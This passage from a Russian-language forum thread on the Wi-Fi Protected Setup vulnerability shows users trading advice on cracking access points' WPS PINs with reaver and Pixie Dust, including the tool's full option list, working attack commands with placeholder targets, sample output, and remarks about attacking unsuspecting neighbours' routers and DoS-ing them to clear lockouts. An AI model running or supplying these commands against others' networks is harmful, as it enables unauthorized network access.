Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    Вы тут пишите:прогнать хендшейк по словарю на пин....Вопрос возник,причём тут пин к хендшейку?разве пин код найдёться прогнав хендшейк?
     
  2. CRACK211

    CRACK211 Elder - Старейшина

    Joined:
    16 Sep 2009
    Messages:
    1,050
    Likes Received:
    1,128
    Reputations:
    11
    Нет. Наверное имеется ввиду особенность некоторых роутеров использующих в качестве ключа от сети wpspin.например в роутерах tp-link пароли=Wps pin. Наверное есть и другие роутеры которые так работают.Соответственно найдя пароль по хендшейку можно узнать и wpspin.но при условии что дефолтный пароль не был сменён )))
     
    #3722 CRACK211, 25 Dec 2016
    Last edited: 25 Dec 2016
  3. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    та фантастика какая то)))
     
  4. CRACK211

    CRACK211 Elder - Старейшина

    Joined:
    16 Sep 2009
    Messages:
    1,050
    Likes Received:
    1,128
    Reputations:
    11
    Посмотрите статистику по tp-link в ветке перебора и на 3wifiчаще всего пароль 8 цифр. А на 3wifi можно увидеть что key=wps pin)))
     
    #3724 CRACK211, 25 Dec 2016
    Last edited: 25 Dec 2016
    Majgap, Mednik, Andrey9999 and 2 others like this.
  5. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    кстати,у кого то получалось с pixie wps открыть точки,которые не попадают в список уязвимых?ну на чипе Atheros например,просто TP LINKи на таком чипе как правило.Или этот метод подходит только к тем чипам,которые в списке указыны?
     
  6. x10

    x10 Well-Known Member

    Joined:
    12 Oct 2016
    Messages:
    306
    Likes Received:
    1,246
    Reputations:
    1
    а можно глянуть на этот список, спасибо!
     
  7. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
  8. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    странно чесно говоря,зачем они в этот список записали роутеры,которые не уязвимы,например TP LINK
    TL-WR740N,я думал список,это те роутеры,которые уязвимы,что ж они все роутеры записали,
    TL-WR740N точно не уязвим,хотя может кто то и пробовал....
     
  9. x10

    x10 Well-Known Member

    Joined:
    12 Oct 2016
    Messages:
    306
    Likes Received:
    1,246
    Reputations:
    1
    а ты столбик WPS посмотри я не вижу что он подвержен какай либо атаке из имеющейся, или просто неизвестно в описании говорится что список неполный
     
    #3729 x10, 25 Dec 2016
    Last edited: 25 Dec 2016
  10. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,248
    Reputations:
    148
    Ну СЕРЖ знает... А чё такое то?
    Случилось чего, старина?
     
    Triton_Mgn likes this.
  11. Stas956457

    Stas956457 New Member

    Joined:
    23 Dec 2016
    Messages:
    26
    Likes Received:
    1
    Reputations:
    0
    я узнал пароль к точке доступа,а посмотреть какой пароль wps не могу
     
  12. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Захватывайте хозяина точки. Принуждайте его силой мысли залогиниться в админке. И перехватывайте пароль к ней.
     
    quite gray, erwerr2321 and Majgap like this.
  13. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    скажите,кто какие флаги вообще ставит в pixie wps dust?ну я имею ввиду,какие обязательно лучше поставить,а то их вон дофига:

    Обязательныеаргументы:
    -i,--interface=<wlan>Имясетевогоинтерфейсадляиспользования
    -b,--bssid=<mac> BSSIDточкидоступа

    Опциональныеаргументы:
    -m,--mac=<mac> MACхостовойсистемы
    -e,--essid=<ssid>ESSIDцелевойТД
    -c,--channel=<channel> Установитьканал802.11дляинтерфейса(подразумевает-f)
    -o,--out-file=<file> Установитьвыводвлог-файл[stdout]
    -s,--session=<file>Восстановитьфайлпредыдущейсессии
    -C,--exec=<command>Выполнитьданнуюкомандупослеуспешногоподборапина
    -D,--daemonize Переводreaverврежимдемона
    -a,--autoАвтоматическиопределитьлучшиепродвинутыеопциидляцелевойТД
    -f,--fixed Отключитьпрыганиепоканалам
    -5,--5ghzИспользоватьканалы5GHz802.11
    -v,--verbose Отображатьнекритическиепредупреждения(-vvчтобыувидетьбольше)
    -q,--quiet Отображатьтолькокритическиепредупреждения
    -K--pixie-dust=<номер> [1]ЗапускаетpixiewpsсPKE,PKR,E-Hash1,E-Hash2,E-NonceиAuthkey(Ralink,Broadcom,Realtek)
    -Z,--no-auto-passНЕзапускатьreaverдляавтоматическогополученияпароляWPA,еслиатакаpixiewpsпрошлауспешно
    -h,--helpПоказатьсправку

    Продвинутыеопции:
    -p,--pin=<wps pin> Использоватьзаданный4или8цифровойWPSпин
    -d,--delay=<секунды> Установитьзадержкумеждупопыткамипина[1]
    -l,--lock-delay=<seconds>Установитьвремяожидания,еслиТДзаблокировалапопыткиводапина[60]
    -g,--max-attempts=<номер>Выйтипослечислапопытокпина
    -x,--fail-wait=<секунды> Установитьвремядляпаузыпосле10неожиданныхнеудач[0]
    -r,--recurring-delay=<x:y> Делатьпаузунаyсекундкаждыеxпопытокпина
    -t,--timeout=<секунды> Установитьпиреодтаймаутаполучения[5]
    -T,--m57-timeout=<секунды> УстановитьпериодтаймаутаM5/M7[0.20]
    -A,--no-associateНесвязыватьсясТД(связьдолжнабытьсделанадругимприложением)
    -N,--no-nacksНеотправлятьсообщенияNACKкогдаполученыпакетыонеисправности
    -S,--dh-smallИспользоватьмалыеDHключидляускоренияскоростивзлома
    -L,--ignore-locksИгнорироватьзаблокированныесостояния,полученныеотцелевойТД
    -E,--eap-terminate ЗавершатькаждуюсессиюWPSпакетомEAP FAIL
    -n,--nackЦелеваяТДвсегдашлётпакетыNACK[Auto]
    -w,--win7МимикрироватьподWindows7registrar[False]
    -X,--exhaustiveУстановитьисчерпывающийрежимсначаласессии[False]
    -1,--p1-indexУстановитьначальныйиндексмассивадляпервойполовиныпина[False]
    -2,--p2-indexУстановитьначальныйиндексмассивадлявторойполовиныпина[False]
    -P,--pixiedust-loopУстановкаврежимPixieLoop(неотправляетM4иделаетпетлюнаM3)[False]
    -W,--generate-pinГенерациядефолтныхпиновоткомандыdevttys0[1]Belkin[2]D-Link
    -H,--pixiedust-log ВключитьлогированиепоследовательностейзавершённыхPixieHashes
    Ну вот и какую команду,с каким набором флагов поставить?
    Интересна опция -Н(
    Опция -H // —pixiedust-log в reaver

    Опция -H — это переключатель включения логирования PixieHashes, сохранённые хеши будут размещены в директории запуска. Эта опция требует включения хотя бы -vvv, и, соответственно, работает с -K 1 & -P.

    Имена сохранённых файлов соответствуют bssid (MAC) цели и имеют расширение .pixie. Внутри этих сохранённых логов вы найдёте все требуемые хеши PixieDust, а также готовые для копипасты полные команды для использованиях их в программе pixiewps. Также есть возможность выполнить их. Просто закиньте этот файл в ваш любимый шелл и выполните его (может понадобиться chmod +x <имя_файла>).
    И тут возникает вопрос,а как сделать эти готовые для копипасты полные команды для использованиях их в программе pixiewps. Также есть возможность выполнить их. Просто закиньте этот файл в ваш любимый шелл и выполните его (может понадобиться chmod +x <имя_файла>).Т.е как выполнить эти полные команды,как закинуть файл в шелл и выполнить?Так как интересная вещь,насобирал штук 10 разных,не одинаковых хешей,потом по одному выполнить и мало ли,из 10 хешей и пин может найтись!Короче вопрос,как выполнить эти команды,как эти файлы в шелл закинуть и выполнить?Кто то уже так пробовал?
     
  14. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    reaver -i wlanXmon -v -c X -b XX:XX:XX:XX:XX:XX -K 1

    Что ещё нужно для счастья? Ну конечно же мануал, переведённый гугл транслейтом, и избавленный от лишних пробелов. :p
     
  15. Sves

    Sves Active Member

    Joined:
    7 Dec 2015
    Messages:
    33
    Likes Received:
    186
    Reputations:
    1
    Что касается параметра -H:
    Code:
    tuser@linux:~$ reaver -i wlan0mon -vvv -P -H -K 1 -b 00:00:00:00:00:00 -c 1
    
    Reaver v1.5.3 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft
    ...
    [*] Saving collected data in: 000000000000.pixie
    ...
    
    Code:
    tuser@linux:~$ chmod a+x 000000000000.pixie
    tuser@linux:~$ ./000000000000.pixie
    
    Pixiewps 1.2
    
    [*] Mode:  1 (RT/MT)
    [*] PSK1:  00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [*] PSK2:  00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [*] E-S1:  00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [*] E-S2:  00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [+] WPS pin:  00000000
    
    [*] Time taken: 0 s 35 ms
    
    Как-то так.
     
    carartem02 and CRACK211 like this.
  16. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    та это самая обычная команда,а флагов то вон полно,неужели все ненужные?
     
  17. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    По ситуации. Иногда использую "-d 0", когда точка быстро обрабатывает пины.
     
  18. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    она как быстро обрабатывает,так и быстро лочится))))сейчас это уже редкость,точки,на которых спокойно пины перебирать можно,сейчас все точки в лок уходят и как правило до ребута....
     
    erwerr2321 likes this.
  19. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Как повезёт. Старенькие D-Link, которые всё ещё стоят за окошками ни в чём не подозревающих юзверей, до сих пор встречаются. И у меня самого такой стоял однажды, со включённым WPS, около 3-х лет! (да, я тогда ещё не знал, мы все когда-то не знали).
     
    Triton_Mgn, erwerr2321 and VladimirV like this.
  20. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    везёт тебе,у меня вокруг одни тп линки.которые лочаться до перезагруза и доссу не подвержены,пофиг им досс....